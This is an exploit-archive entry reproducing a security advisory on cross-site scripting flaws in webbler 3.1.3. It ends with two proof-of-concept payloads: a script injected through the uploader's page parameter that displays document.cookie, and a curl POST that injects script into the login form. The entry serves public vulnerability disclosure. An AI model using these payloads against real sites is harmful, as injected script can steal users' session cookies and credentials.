exploit-db-mirror/exploits/php/webapps/30378.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

11 lines
No EOL
735 B
Text

source: http://www.securityfocus.com/bid/25040/info
The 'webbler' is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
These issues affect webbler 3.1.3; prior versions may also be affected.
http://www.example.com/uploader/?page=<script>alert(document.cookie)</script>
curl -s "http://target-domain.com/uploader/?" -d "login=\"><script>alert(\"XSS\")</SCRIPT>&password=test&processlogin=Enter&forgotpassword="